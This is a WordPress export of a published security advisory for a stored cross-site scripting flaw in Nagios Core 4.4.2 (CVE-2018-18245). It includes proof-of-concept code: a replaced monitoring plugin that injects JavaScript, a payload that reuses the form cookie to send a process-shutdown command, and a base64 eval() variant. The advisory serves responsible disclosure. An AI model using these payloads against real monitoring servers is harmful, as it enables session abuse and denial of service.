{"id":16573,"date":"2021-07-08T10:13:35","date_gmt":"2021-07-08T08:13:35","guid":{"rendered":"https:\/\/herolab-usd.formwandler.rocks\/security-advisories\/usd-2018-0026\/"},"modified":"2021-07-19T14:09:11","modified_gmt":"2021-07-19T12:09:11","slug":"usd-2018-0026","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2018-0026\/","title":{"rendered":"usd-2018-0026"},"content":{"rendered":"<p>[et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n<h1 class=\"h-custom-headline usd-small-letters h2\"><span>usd-2018-0026 | Nagios Core\/4.4.2<\/span><\/h1>\n<p><strong>Advisory ID<\/strong><span>: usd-2018-0026<\/span><br \/><strong>CVE Number<\/strong><span>: CVE-2018-18245<\/span><br \/><strong>Affected Product<\/strong><span>: Nagios Core<\/span><br \/><strong>Affected Version<\/strong><span>: 4.4.2<\/span><br \/><strong>Vulnerability Type<\/strong><span>: Cross-Site Scripting (XSS)<\/span><br \/><strong>Security Risk<\/strong><span>: Medium<\/span><br \/><strong>Vendor URL<\/strong><span>: <\/span><a href=\"https:\/\/www.nagios.com\/\" target=\"_blank\" rel=\"noopener\">https:\/\/www.nagios.com<\/a><br \/><strong>Vendor Status<\/strong><span>: Not fixed<\/span><\/p>\n<h3>Description<\/h3>\n<p>A cross-site scripting (XSS) vulnerability has been discovered in Nagios Core. This vulnerability allows attackers to place malicious JavaScript code into the web frontend through manipulation of plugin output. In order to do this, the attacker needs to be able to manipulate the output returned by Nagios checks, e.g. by replacing a plugin on one of the monitored endpoints. 
Execution of the payload then requires that an authenticated user creates an alert summary report which contains the corresponding output.<\/p>\n<p>Nagios Core is a platform for network and system monitoring. It provides a web application for administrators which displays the current status of the monitored entities. Nagios uses plugins executed by the central server and plugins executed on the monitored endpoints via the NRPE service. An attacker that controls one of those endpoints has the ability to either modify plugin output or to replace the plugins executed on those endpoints. Accordingly, attackers may be able to control what is displayed to authenticated users within the web application. Nagios takes care to properly encode plugin results in most places to prevent XSS attacks. However, in the case of alert summary reports the output is not encoded, enabling attacks against the web application and its users.<\/p>\n<h3>Proof of Concept<\/h3>\n<p><span>Simple PoC:<\/span><br \/><span>An attacker that controls one of the systems monitored with NRPE replaces the check_load plugin with the following simple bash script:<\/span><\/p>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]<\/p>\n<pre><code>#!\/bin\/bash<br \/>\nVERSION=1.0<br \/>\nVERBOSE=0<br \/>\nPROGNAME=`\/usr\/bin\/basename $0`<br \/>\nPROGPATH=`echo $0 | \/bin\/sed -e 's,[\\\\\/][^\\\\\/][^\\\\\/]*$,,'`<br \/>\n. $PROGPATH\/utils.sh<br \/>\necho -n \"alert(document.cookie)\"<br \/>\nexitCode=1<br \/>\necho -n \"Testoutput\"<br \/>\nexit $exitCode<\/code><\/pre>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n<p>As soon as the results of the modified check show up in the Nagios web interface, the payload should be in place. 
Note: The check status (exitCode) may need to be changed (to either 1 or 2) to make sure that an alert for the current status shows up on the summary page. When a user now views an alert summary report at \/nagios\/cgi-bin\/summary.cgi and creates a report that contains the manipulated check result, the payload will be executed.<\/p>\n<p><span>Denial of Service PoC: Nagios Process Shutdown<\/span><br \/><span>A more interesting attack would be to shut down the Nagios process on the central server. To achieve this, the following JavaScript code is used:<\/span><\/p>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]<\/p>\n<pre><code>function submitRequest()<br \/>\n{<br \/>\nvar xhr = new XMLHttpRequest();<br \/>\nxhr.open(\"POST\", \"http:\\\/\\\/10.10.10.10\\\/nagios\\\/cgi-bin\\\/cmd.cgi\", true);<br \/>\nxhr.setRequestHeader(\"Accept\", \"text\\\/html,application\\\/xhtml+xml,application\\\/xml;q=0.9,*\\\/*;q=0.8\");<br \/>\nxhr.setRequestHeader(\"Accept-Language\", \"en-US,en;q=0.5\");<br \/>\nxhr.setRequestHeader(\"Content-Type\", \"application\\\/x-www-form-urlencoded\");<br \/>\nxhr.withCredentials = true;<br \/>\nvar cvalue = document.cookie.substring(10);<br \/>\nvar body = \"nagFormId=\"+cvalue;<br \/>\nbody+=\"&amp;cmd_typ=14&amp;cmd_mod=2&amp;btnSubmit=Commit\";<br \/>\nvar aBody = new Uint8Array(body.length);<br \/>\nfor (var i = 0; i &lt; aBody.length; i++)<br \/>\naBody[i] = body.charCodeAt(i);<br \/>\nxhr.send(new Blob([aBody]));<br \/>\n}<br \/>\nsubmitRequest();<\/code><\/pre>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" custom_margin=\"||27px||false|false\"]<\/p>\n<p>The above script extracts the value of the NagFormId cookie and places it into the nagFormId form variable. 
It then automatically sends a POST request to \/nagios\/cgi-bin\/cmd.cgi with cmd_typ=14, which causes the Nagios process to shut down. This functionality is available to users under the \u201cProcess Info\u201d navigation item. Note: The POST URL needs to point to the hostname or IP address of the actual Nagios server.<\/p>\n<p>To prevent issues with semicolons in the JavaScript payload, the JavaScript code is encoded with base64, wrapped in an eval() call and placed into the malicious plugin. The full PoC plugin then looks like this:<\/p>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]<\/p>\n<pre><code>#!\/bin\/bash<br \/>\nVERSION=1.0<br \/>\nVERBOSE=0<br \/>\nPROGNAME=`\/usr\/bin\/basename $0`<br \/>\nPROGPATH=`echo $0 | \/bin\/sed -e 's,[\\\\\/][^\\\\\/][^\\\\\/]*$,,'`<br \/>\n. $PROGPATH\/utils.sh<br \/>\necho -n \"eval(atob('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'))\"<br \/>\nexitCode=1<br \/>\necho -n \"Testoutput\"<br \/>\nexit $exitCode<\/code><\/pre>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n<div class=\"e16902-22 x-container max width\">\n<div class=\"e16902-23 x-column x-sm x-1-1\">\n<h3>Fix<\/h3>\n<p><span>Encode output received from Nagios plugins.<\/span><br \/><span>https:\/\/www.owasp.org\/index.php\/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet<\/span><\/p>\n<h3>Timeline<\/h3>\n<ul>\n<li>2018-09-11 first contact request via security@nagios.com<\/li>\n<li>2018-09-12 provided advisory via our secure transfer platform<\/li>\n<li>2018-10-12 received CVE ID and notified vendor about it<\/li>\n<li>2018-12-07 security advisory released<\/li>\n<\/ul>\n<h3>Credits<\/h3>\n<p><span>This security vulnerability was found by Maximilian Boehner of usd 
AG.<\/span><\/p>\n<\/div>\n<\/div>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>usd-2018-0026 | Nagios Core\/4.4.2 Advisory ID: usd-2018-0026CVE Number: CVE-2018-18245Affected Product: Nagios CoreAffected Version: 4.4.2Vulnerability Type: Cross-Site Scripting (XSS)Security Risk: MediumVendor URL: https:\/\/www.nagios.comVendor Status: Not fixed Description A cross-site scripting (XSS) vulnerability has been discovered in Nagios Core. This vulnerability allows attackers to place malicious JavaScript code into the web frontend through manipulation of plugin output. [&hellip;]<\/p>\n","protected":false},"author":96,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-16573","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16573","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/96"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=16573"}],"version-history":[{"count":0,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16573\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=16573"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}